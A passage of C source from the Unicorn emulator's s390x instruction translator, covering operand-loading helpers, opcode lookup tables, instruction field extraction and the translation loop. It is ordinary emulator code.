SPEC_in1_la1 0 static void in1_la2(DisasContext *s, DisasOps *o) { int x2 = have_field(s, x2) ? 
get_field(s, x2) : 0; o->addr1 = get_address(s, x2, get_field(s, b2), get_field(s, d2)); } #define SPEC_in1_la2 0 static void in1_m1_8u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in1_la1(s, o); o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld8u(tcg_ctx, o->in1, o->addr1, get_mem_index(s)); } #define SPEC_in1_m1_8u 0 static void in1_m1_16s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in1_la1(s, o); o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld16s(tcg_ctx, o->in1, o->addr1, get_mem_index(s)); } #define SPEC_in1_m1_16s 0 static void in1_m1_16u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in1_la1(s, o); o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld16u(tcg_ctx, o->in1, o->addr1, get_mem_index(s)); } #define SPEC_in1_m1_16u 0 static void in1_m1_32s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in1_la1(s, o); o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld32s(tcg_ctx, o->in1, o->addr1, get_mem_index(s)); } #define SPEC_in1_m1_32s 0 static void in1_m1_32u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in1_la1(s, o); o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld32u(tcg_ctx, o->in1, o->addr1, get_mem_index(s)); } #define SPEC_in1_m1_32u 0 static void in1_m1_64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in1_la1(s, o); o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld64(tcg_ctx, o->in1, o->addr1, get_mem_index(s)); } #define SPEC_in1_m1_64 0 /* ====================================================================== */ /* The "INput 2" generators. These load the second operand to an insn. */ static void in2_r1_o(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_ctx->regs[get_field(s, r1)]; o->g_in2 = true; } #define SPEC_in2_r1_o 0 static void in2_r1_16u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext16u_i64(tcg_ctx, o->in2, tcg_ctx->regs[get_field(s, r1)]); } #define SPEC_in2_r1_16u 0 static void in2_r1_32u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32u_i64(tcg_ctx, o->in2, tcg_ctx->regs[get_field(s, r1)]); } #define SPEC_in2_r1_32u 0 static void in2_r1_D32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); o->in2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat32_i64(tcg_ctx, o->in2, tcg_ctx->regs[r1 + 1], tcg_ctx->regs[r1]); } #define SPEC_in2_r1_D32 SPEC_r1_even static void in2_r2(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = load_reg(tcg_ctx, get_field(s, r2)); } #define SPEC_in2_r2 0 static void in2_r2_o(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_ctx->regs[get_field(s, r2)]; o->g_in2 = true; } #define SPEC_in2_r2_o 0 static void in2_r2_nz(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r2 = get_field(s, r2); if (r2 != 0) { o->in2 = load_reg(tcg_ctx, r2); } } #define SPEC_in2_r2_nz 0 static void in2_r2_8s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext8s_i64(tcg_ctx, o->in2, tcg_ctx->regs[get_field(s, r2)]); } #define SPEC_in2_r2_8s 0 static void in2_r2_8u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext8u_i64(tcg_ctx, o->in2, tcg_ctx->regs[get_field(s, r2)]); } #define 
SPEC_in2_r2_8u 0 static void in2_r2_16s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext16s_i64(tcg_ctx, o->in2, tcg_ctx->regs[get_field(s, r2)]); } #define SPEC_in2_r2_16s 0 static void in2_r2_16u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext16u_i64(tcg_ctx, o->in2, tcg_ctx->regs[get_field(s, r2)]); } #define SPEC_in2_r2_16u 0 static void in2_r3(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = load_reg(tcg_ctx, get_field(s, r3)); } #define SPEC_in2_r3 0 static void in2_r3_sr32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, o->in2, tcg_ctx->regs[get_field(s, r3)], 32); } #define SPEC_in2_r3_sr32 0 static void in2_r3_32u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32u_i64(tcg_ctx, o->in2, tcg_ctx->regs[get_field(s, r3)]); } #define SPEC_in2_r3_32u 0 static void in2_r2_32s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32s_i64(tcg_ctx, o->in2, tcg_ctx->regs[get_field(s, r2)]); } #define SPEC_in2_r2_32s 0 static void in2_r2_32u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32u_i64(tcg_ctx, o->in2, tcg_ctx->regs[get_field(s, r2)]); } #define SPEC_in2_r2_32u 0 static void in2_r2_sr32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, o->in2, tcg_ctx->regs[get_field(s, r2)], 32); } #define SPEC_in2_r2_sr32 0 static void in2_e2(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = load_freg32_i64(tcg_ctx, get_field(s, r2)); } #define SPEC_in2_e2 0 static void in2_f2(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = load_freg(tcg_ctx, get_field(s, r2)); } #define SPEC_in2_f2 0 /* Load the low double word of an extended (128-bit) format FP number */ static void in2_x2l(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = load_freg(tcg_ctx, get_field(s, r2) + 2); } #define SPEC_in2_x2l SPEC_r2_f128 static void in2_ra2(DisasContext *s, DisasOps *o) { o->in2 = get_address(s, 0, get_field(s, r2), 0); } #define SPEC_in2_ra2 0 static void in2_a2(DisasContext *s, DisasOps *o) { int x2 = have_field(s, x2) ? 
get_field(s, x2) : 0; o->in2 = get_address(s, x2, get_field(s, b2), get_field(s, d2)); } #define SPEC_in2_a2 0 static void in2_ri2(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_const_i64(tcg_ctx, s->base.pc_next + (int64_t)get_field(s, i2) * 2); } #define SPEC_in2_ri2 0 static void in2_sh(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int b2 = get_field(s, b2); int d2 = get_field(s, d2); if (b2 == 0) { o->in2 = tcg_const_i64(tcg_ctx, d2 & 0x3f); } else { o->in2 = get_address(s, 0, b2, d2); tcg_gen_andi_i64(tcg_ctx, o->in2, o->in2, 0x3f); } } #define SPEC_in2_sh 0 static void in2_m2_8u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in2_a2(s, o); tcg_gen_qemu_ld8u(tcg_ctx, o->in2, o->in2, get_mem_index(s)); } #define SPEC_in2_m2_8u 0 static void in2_m2_16s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in2_a2(s, o); tcg_gen_qemu_ld16s(tcg_ctx, o->in2, o->in2, get_mem_index(s)); } #define SPEC_in2_m2_16s 0 static void in2_m2_16u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in2_a2(s, o); tcg_gen_qemu_ld16u(tcg_ctx, o->in2, o->in2, get_mem_index(s)); } #define SPEC_in2_m2_16u 0 static void in2_m2_32s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in2_a2(s, o); tcg_gen_qemu_ld32s(tcg_ctx, o->in2, o->in2, get_mem_index(s)); } #define SPEC_in2_m2_32s 0 static void in2_m2_32u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in2_a2(s, o); tcg_gen_qemu_ld32u(tcg_ctx, o->in2, o->in2, get_mem_index(s)); } #define SPEC_in2_m2_32u 0 static void in2_m2_32ua(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in2_a2(s, o); tcg_gen_qemu_ld_tl(tcg_ctx, o->in2, o->in2, get_mem_index(s), MO_TEUL | MO_ALIGN); } #define SPEC_in2_m2_32ua 0 static void in2_m2_64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in2_a2(s, o); tcg_gen_qemu_ld64(tcg_ctx, o->in2, o->in2, get_mem_index(s)); } #define SPEC_in2_m2_64 0 static void in2_m2_64a(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in2_a2(s, o); tcg_gen_qemu_ld_i64(tcg_ctx, o->in2, o->in2, get_mem_index(s), MO_TEQ | MO_ALIGN); } #define SPEC_in2_m2_64a 0 static void in2_mri2_16u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in2_ri2(s, o); tcg_gen_qemu_ld16u(tcg_ctx, o->in2, o->in2, get_mem_index(s)); } #define SPEC_in2_mri2_16u 0 static void in2_mri2_32s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in2_ri2(s, o); tcg_gen_qemu_ld32s(tcg_ctx, o->in2, o->in2, get_mem_index(s)); } #define SPEC_in2_mri2_32s 0 static void in2_mri2_32u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in2_ri2(s, o); tcg_gen_qemu_ld32u(tcg_ctx, o->in2, o->in2, get_mem_index(s)); } #define SPEC_in2_mri2_32u 0 static void in2_mri2_64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in2_ri2(s, o); tcg_gen_qemu_ld64(tcg_ctx, o->in2, o->in2, get_mem_index(s)); } #define SPEC_in2_mri2_64 0 static void in2_i2(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_const_i64(tcg_ctx, get_field(s, i2)); } #define SPEC_in2_i2 0 static void in2_i2_8u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_const_i64(tcg_ctx, (uint8_t)get_field(s, i2)); } #define SPEC_in2_i2_8u 0 static void in2_i2_16u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_const_i64(tcg_ctx, (uint16_t)get_field(s, 
i2)); } #define SPEC_in2_i2_16u 0 static void in2_i2_32u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_const_i64(tcg_ctx, (uint32_t)get_field(s, i2)); } #define SPEC_in2_i2_32u 0 static void in2_i2_16u_shl(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint64_t i2 = (uint16_t)get_field(s, i2); o->in2 = tcg_const_i64(tcg_ctx, i2 << s->insn->data); } #define SPEC_in2_i2_16u_shl 0 static void in2_i2_32u_shl(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint64_t i2 = (uint32_t)get_field(s, i2); o->in2 = tcg_const_i64(tcg_ctx, i2 << s->insn->data); } #define SPEC_in2_i2_32u_shl 0 static void in2_insn(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_const_i64(tcg_ctx, s->fields.raw_insn); } #define SPEC_in2_insn 0 /* ====================================================================== */ /* Find opc within the table of insns. This is formulated as a switch statement so that (1) we get compile-time notice of cut-paste errors for duplicated opcodes, and (2) the compiler generates the binary search tree, rather than us having to post-process the table. */ #define C(OPC, NM, FT, FC, I1, I2, P, W, OP, CC) \ E(OPC, NM, FT, FC, I1, I2, P, W, OP, CC, 0, 0) #define D(OPC, NM, FT, FC, I1, I2, P, W, OP, CC, D) \ E(OPC, NM, FT, FC, I1, I2, P, W, OP, CC, D, 0) #define F(OPC, NM, FT, FC, I1, I2, P, W, OP, CC, FL) \ E(OPC, NM, FT, FC, I1, I2, P, W, OP, CC, 0, FL) #define E(OPC, NM, FT, FC, I1, I2, P, W, OP, CC, D, FL) insn_ ## NM, enum DisasInsnEnum { #include "insn-data.def" }; #undef E #define E(OPC, NM, FT, FC, I1, I2, P, W, OP, CC, D, FL) { \ .opc = OPC, \ .flags = FL, \ .fmt = FMT_##FT, \ .fac = FAC_##FC, \ .spec = SPEC_in1_##I1 | SPEC_in2_##I2 | SPEC_prep_##P | SPEC_wout_##W, \ .name = #NM, \ .help_in1 = in1_##I1, \ .help_in2 = in2_##I2, \ .help_prep = prep_##P, \ .help_wout = wout_##W, \ .help_cout = cout_##CC, \ .help_op = op_##OP, \ .data = D \ }, /* Allow 0 to be used for NULL in the table below. */ #define in1_0 NULL #define in2_0 NULL #define prep_0 NULL #define wout_0 NULL #define cout_0 NULL #define op_0 NULL #define SPEC_in1_0 0 #define SPEC_in2_0 0 #define SPEC_prep_0 0 #define SPEC_wout_0 0 /* Give smaller names to the various facilities. 
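Several aliases share a single STFLE feature bit; the trailing comments record which architectural facility each alias stands for.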
*/ #define FAC_Z S390_FEAT_ZARCH #define FAC_CASS S390_FEAT_COMPARE_AND_SWAP_AND_STORE #define FAC_DFP S390_FEAT_DFP #define FAC_DFPR S390_FEAT_FLOATING_POINT_SUPPPORT_ENH /* DFP-rounding */ #define FAC_DO S390_FEAT_STFLE_45 /* distinct-operands */ #define FAC_EE S390_FEAT_EXECUTE_EXT #define FAC_EI S390_FEAT_EXTENDED_IMMEDIATE #define FAC_FPE S390_FEAT_FLOATING_POINT_EXT #define FAC_FPSSH S390_FEAT_FLOATING_POINT_SUPPPORT_ENH /* FPS-sign-handling */ #define FAC_FPRGR S390_FEAT_FLOATING_POINT_SUPPPORT_ENH /* FPR-GR-transfer */ #define FAC_GIE S390_FEAT_GENERAL_INSTRUCTIONS_EXT #define FAC_HFP_MA S390_FEAT_HFP_MADDSUB #define FAC_HW S390_FEAT_STFLE_45 /* high-word */ #define FAC_IEEEE_SIM S390_FEAT_FLOATING_POINT_SUPPPORT_ENH /* IEEE-exception-simulation */ #define FAC_MIE S390_FEAT_STFLE_49 /* misc-instruction-extensions */ #define FAC_LAT S390_FEAT_STFLE_49 /* load-and-trap */ #define FAC_LOC S390_FEAT_STFLE_45 /* load/store on condition 1 */ #define FAC_LOC2 S390_FEAT_STFLE_53 /* load/store on condition 2 */ #define FAC_LD S390_FEAT_LONG_DISPLACEMENT #define FAC_PC S390_FEAT_STFLE_45 /* population count */ #define FAC_SCF S390_FEAT_STORE_CLOCK_FAST #define FAC_SFLE S390_FEAT_STFLE #define FAC_ILA S390_FEAT_STFLE_45 /* interlocked-access-facility 1 */ #define FAC_MVCOS S390_FEAT_MOVE_WITH_OPTIONAL_SPEC #define FAC_LPP S390_FEAT_SET_PROGRAM_PARAMETERS /* load-program-parameter */ #define FAC_DAT_ENH S390_FEAT_DAT_ENH #define FAC_E2 S390_FEAT_EXTENDED_TRANSLATION_2 #define FAC_EH S390_FEAT_STFLE_49 /* execution-hint */ #define FAC_PPA S390_FEAT_STFLE_49 /* processor-assist */ #define FAC_LZRB S390_FEAT_STFLE_53 /* load-and-zero-rightmost-byte */ #define FAC_ETF3 S390_FEAT_EXTENDED_TRANSLATION_3 #define FAC_MSA S390_FEAT_MSA /* message-security-assist facility */ #define FAC_MSA3 S390_FEAT_MSA_EXT_3 /* msa-extension-3 facility */ #define FAC_MSA4 S390_FEAT_MSA_EXT_4 /* msa-extension-4 facility */ #define FAC_MSA5 S390_FEAT_MSA_EXT_5 /* msa-extension-5 facility */ #define FAC_ECT S390_FEAT_EXTRACT_CPU_TIME #define FAC_PCI S390_FEAT_ZPCI /* z/PCI facility */ #define FAC_AIS S390_FEAT_ADAPTER_INT_SUPPRESSION #define FAC_V S390_FEAT_VECTOR /* vector facility */ #define FAC_VE S390_FEAT_VECTOR_ENH /* vector enhancements facility 1 */ static const DisasInsn insn_info[] = { #include "insn-data.def" }; #undef E #define E(OPC, NM, FT, FC, I1, I2, P, W, OP, CC, D, FL) \ case OPC: return &insn_info[insn_ ## NM]; static const DisasInsn *lookup_opc(uint16_t opc) { switch (opc) { #include "insn-data.def" default: return NULL; } } #undef F #undef E #undef D #undef C /* Extract a field from the insn. The INSN should be left-aligned in the uint64_t so that we can more easily utilize the big-bit-endian definitions we extract from the Principles of Operation. */ static void extract_field(DisasFields *o, const DisasField *f, uint64_t insn) { uint32_t r, m; if (f->size == 0) { return; } /* Zero extract the field from the insn. */ r = (insn << f->beg) >> (64 - f->size); /* Sign-extend, or un-swap the field as necessary. */ switch (f->type) { case 0: /* unsigned */ break; case 1: /* signed */ assert(f->size <= 32); m = 1u << (f->size - 1); r = (r ^ m) - m; break; case 2: /* dl+dh split, signed 20 bit.
*/ r = ((int8_t)r << 12) | (r >> 8); break; case 3: /* MSB stored in RXB */ g_assert(f->size == 4); switch (f->beg) { case 8: r |= extract64(insn, 63 - 36, 1) << 4; break; case 12: r |= extract64(insn, 63 - 37, 1) << 4; break; case 16: r |= extract64(insn, 63 - 38, 1) << 4; break; case 32: r |= extract64(insn, 63 - 39, 1) << 4; break; default: // g_assert_not_reached(); break; } break; default: abort(); } /* Validate that the "compressed" encoding we selected above is valid. I.e. we haven't made two different original fields overlap. */ assert(((o->presentC >> f->indexC) & 1) == 0); o->presentC |= 1 << f->indexC; o->presentO |= 1 << f->indexO; o->c[f->indexC] = r; } /* Lookup the insn at the current PC, extracting the operands into O and returning the info struct for the insn. Returns NULL for invalid insn. */ static const DisasInsn *extract_insn(CPUS390XState *env, DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint64_t insn, pc = s->base.pc_next; int op, op2, ilen; const DisasInsn *info; if (unlikely(s->ex_value)) { /* Drop the EX data now, so that it's clear on exception paths. */ TCGv_i64 zero = tcg_const_i64(tcg_ctx, 0); tcg_gen_st_i64(tcg_ctx, zero, tcg_ctx->cpu_env, offsetof(CPUS390XState, ex_value)); tcg_temp_free_i64(tcg_ctx, zero); /* Extract the values saved by EXECUTE. */ insn = s->ex_value & 0xffffffffffff0000ull; ilen = s->ex_value & 0xf; op = insn >> 56; } else { insn = ld_code2(env, pc); op = (insn >> 8) & 0xff; ilen = get_ilen(op); switch (ilen) { case 2: insn = insn << 48; break; case 4: insn = ld_code4(env, pc) << 32; break; case 6: insn = (insn << 48) | (ld_code4(env, pc + 2) << 16); break; default: // g_assert_not_reached(); break; } } s->pc_tmp = s->base.pc_next + ilen; s->ilen = ilen; /* We can't actually determine the insn format until we've looked up the full insn opcode, which we can't do without locating the secondary opcode. Assume by default that OP2 is at bit 40; for those smaller insns that don't actually have a secondary opcode this will correctly result in OP2 = 0. */ switch (op) { case 0x01: /* E */ case 0x80: /* S */ case 0x82: /* S */ case 0x93: /* S */ case 0xb2: /* S, RRF, RRE, IE */ case 0xb3: /* RRE, RRD, RRF */ case 0xb9: /* RRE, RRF */ case 0xe5: /* SSE, SIL */ op2 = (insn << 8) >> 56; break; case 0xa5: /* RI */ case 0xa7: /* RI */ case 0xc0: /* RIL */ case 0xc2: /* RIL */ case 0xc4: /* RIL */ case 0xc6: /* RIL */ case 0xc8: /* SSF */ case 0xcc: /* RIL */ op2 = (insn << 12) >> 60; break; case 0xc5: /* MII */ case 0xc7: /* SMI */ case 0xd0: case 0xd1: case 0xd2: case 0xd3: case 0xd4: case 0xd5: case 0xd6: case 0xd7: case 0xd8: case 0xd9: case 0xda: case 0xdb: case 0xdc: case 0xdd: case 0xde: case 0xdf: // case 0xd0 ... 0xdf: /* SS */ case 0xe1: /* SS */ case 0xe2: /* SS */ case 0xe8: /* SS */ case 0xe9: /* SS */ case 0xea: /* SS */ case 0xee: case 0xef: case 0xf0: case 0xf1: case 0xf2: case 0xf3: // case 0xee ... 0xf3: /* SS */ case 0xf8: case 0xf9: case 0xfa: case 0xfb: case 0xfc: case 0xfd: // case 0xf8 ... 0xfd: /* SS */ op2 = 0; break; default: op2 = (insn << 40) >> 56; break; } memset(&s->fields, 0, sizeof(s->fields)); s->fields.raw_insn = insn; s->fields.op = op; s->fields.op2 = op2; /* Lookup the instruction. */ info = lookup_opc(op << 8 | op2); s->insn = info; /* If we found it, extract the operands.
*/ if (info != NULL) { DisasFormat fmt = info->fmt; int i; for (i = 0; i < NUM_C_FIELD; ++i) { extract_field(&s->fields, &format_info[fmt].op[i], insn); } } return info; } static bool is_afp_reg(int reg) { return reg % 2 || reg > 6; } static bool is_fp_pair(int reg) { /* 0,1,4,5,8,9,12,13: to exclude the others, check for single bit */ return !(reg & 0x2); } static DisasJumpType translate_one(CPUS390XState *env, DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const DisasInsn *insn; DisasJumpType ret = DISAS_NEXT; DisasOps o = { 0 }; /* Search for the insn in the table. */ insn = extract_insn(env, s); /* Emit insn_start now that we know the ILEN. */ tcg_gen_insn_start(tcg_ctx, s->base.pc_next, s->cc_op, s->ilen); // Unicorn: trace this instruction on request if (HOOK_EXISTS_BOUNDED(s->uc, UC_HOOK_CODE, s->base.pc_next)) { gen_uc_tracecode(tcg_ctx, s->ilen, UC_HOOK_CODE_IDX, s->uc, s->base.pc_next); // the callback might want to stop emulation immediately check_exit_request(tcg_ctx); } /* Not found means unimplemented/illegal opcode. */ if (insn == NULL) { // qemu_log_mask(LOG_UNIMP, "unimplemented opcode 0x%02x%02x\n", // s->fields.op, s->fields.op2); gen_illegal_opcode(s); return DISAS_NORETURN; } if (s->base.tb->flags & FLAG_MASK_PER) { TCGv_i64 addr = tcg_const_i64(tcg_ctx, s->base.pc_next); gen_helper_per_ifetch(tcg_ctx, tcg_ctx->cpu_env, addr); tcg_temp_free_i64(tcg_ctx, addr); } /* process flags */ if (insn->flags) { /* privileged instruction */ if ((s->base.tb->flags & FLAG_MASK_PSTATE) && (insn->flags & IF_PRIV)) { gen_program_exception(s, PGM_PRIVILEGED); return DISAS_NORETURN; } /* if AFP is not enabled, instructions and registers are forbidden */ if (!(s->base.tb->flags & FLAG_MASK_AFP)) { uint8_t dxc = 0; if ((insn->flags & IF_AFP1) && is_afp_reg(get_field(s, r1))) { dxc = 1; } if ((insn->flags & IF_AFP2) && is_afp_reg(get_field(s, r2))) { dxc = 1; } if ((insn->flags & IF_AFP3) && is_afp_reg(get_field(s, r3))) { dxc = 1; } if (insn->flags & IF_BFP) { dxc = 2; } if (insn->flags & IF_DFP) { dxc = 3; } if (insn->flags & IF_VEC) { dxc = 0xfe; } if (dxc) { gen_data_exception(tcg_ctx, dxc); return DISAS_NORETURN; } } /* if vector instructions not enabled, executing them is forbidden */ if (insn->flags & IF_VEC) { if (!((s->base.tb->flags & FLAG_MASK_VECTOR))) { gen_data_exception(tcg_ctx, 0xfe); return DISAS_NORETURN; } } } /* Check for insn specification exceptions. */ if (insn->spec) { if ((insn->spec & SPEC_r1_even && get_field(s, r1) & 1) || (insn->spec & SPEC_r2_even && get_field(s, r2) & 1) || (insn->spec & SPEC_r3_even && get_field(s, r3) & 1) || (insn->spec & SPEC_r1_f128 && !is_fp_pair(get_field(s, r1))) || (insn->spec & SPEC_r2_f128 && !is_fp_pair(get_field(s, r2)))) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } } /* Implement the instruction. */ if (insn->help_in1) { insn->help_in1(s, &o); } if (insn->help_in2) { insn->help_in2(s, &o); } if (insn->help_prep) { insn->help_prep(s, &o); } if (insn->help_op) { ret = insn->help_op(s, &o); } if (ret != DISAS_NORETURN) { if (insn->help_wout) { insn->help_wout(s, &o); } if (insn->help_cout) { insn->help_cout(s, &o); } } /* Free any temporaries created by the helpers. 
*/ if (o.out && !o.g_out) { tcg_temp_free_i64(tcg_ctx, o.out); } if (o.out2 && !o.g_out2) { tcg_temp_free_i64(tcg_ctx, o.out2); } if (o.in1 && !o.g_in1) { tcg_temp_free_i64(tcg_ctx, o.in1); } if (o.in2 && !o.g_in2) { tcg_temp_free_i64(tcg_ctx, o.in2); } if (o.addr1) { tcg_temp_free_i64(tcg_ctx, o.addr1); } if (s->base.tb->flags & FLAG_MASK_PER) { /* An exception might be triggered; save the PSW if not already done. */ if (ret == DISAS_NEXT || ret == DISAS_PC_STALE) { tcg_gen_movi_i64(tcg_ctx, tcg_ctx->psw_addr, s->pc_tmp); } /* Call the helper to check for a possible PER exception. */ gen_helper_per_check_exception(tcg_ctx, tcg_ctx->cpu_env); } /* Advance to the next instruction. */ s->base.pc_next = s->pc_tmp; return ret; } static void s390x_tr_init_disas_context(DisasContextBase *dcbase, CPUState *cs) { DisasContext *dc = container_of(dcbase, DisasContext, base); struct uc_struct *uc = cs->uc; // unicorn handle dc->uc = uc; /* 31-bit mode */ if (!(dc->base.tb->flags & FLAG_MASK_64)) { dc->base.pc_first &= 0x7fffffff; dc->base.pc_next = dc->base.pc_first; } dc->cc_op = CC_OP_DYNAMIC; dc->ex_value = dc->base.tb->cs_base; dc->do_debug = dc->base.singlestep_enabled; } static void s390x_tr_tb_start(DisasContextBase *db, CPUState *cs) { } static void s390x_tr_insn_start(DisasContextBase *dcbase, CPUState *cs) { } static bool s390x_tr_breakpoint_check(DisasContextBase *dcbase, CPUState *cs, const CPUBreakpoint *bp) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; /* * Emit an insn_start to accompany the breakpoint exception. * The ILEN value is a dummy, since this does not result in * an s390x exception, but an internal qemu exception which * brings us back to interact with the gdbstub. */ tcg_gen_insn_start(tcg_ctx, dc->base.pc_next, dc->cc_op, 2); dc->base.is_jmp = DISAS_PC_STALE; dc->do_debug = true; /* The address covered by the breakpoint must be included in [tb->pc, tb->pc + tb->size) in order for it to be properly cleared -- thus we increment the PC here so that the logic setting tb->size does the right thing. */ dc->base.pc_next += 2; return true; } static void s390x_tr_translate_insn(DisasContextBase *dcbase, CPUState *cs) { CPUS390XState *env = cs->env_ptr; DisasContext *dc = container_of(dcbase, DisasContext, base); // Unicorn: end address tells us to stop emulation if (uc_addr_is_exit(dc->uc, dcbase->pc_next)) { // imitate PGM exception to halt emulation dcbase->is_jmp = DISAS_UNICORN_HALT; } else { dc->base.is_jmp = translate_one(env, dc); if (dc->base.is_jmp == DISAS_NEXT) { uint64_t page_start; page_start = dc->base.pc_first & TARGET_PAGE_MASK; if (dc->base.pc_next - page_start >= TARGET_PAGE_SIZE || dc->ex_value) { dc->base.is_jmp = DISAS_TOO_MANY; } } } } static void s390x_tr_tb_stop(DisasContextBase *dcbase, CPUState *cs) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; switch (dc->base.is_jmp) { case DISAS_UNICORN_HALT: tcg_gen_insn_start(tcg_ctx, dc->base.pc_next, 0, 0); update_psw_addr(dc); update_cc_op(dc); gen_helper_uc_s390x_exit(tcg_ctx, tcg_ctx->cpu_env); break; case DISAS_GOTO_TB: case DISAS_NORETURN: break; case DISAS_TOO_MANY: case DISAS_PC_STALE: case DISAS_PC_STALE_NOCHAIN: update_psw_addr(dc); /* FALLTHRU */ case DISAS_PC_UPDATED: /* Next TB starts off with CC_OP_DYNAMIC, so make sure the cc op type is in env */ update_cc_op(dc); /* FALLTHRU */ case DISAS_PC_CC_UPDATED: /* Exit the TB, either by raising a debug exception or by return.
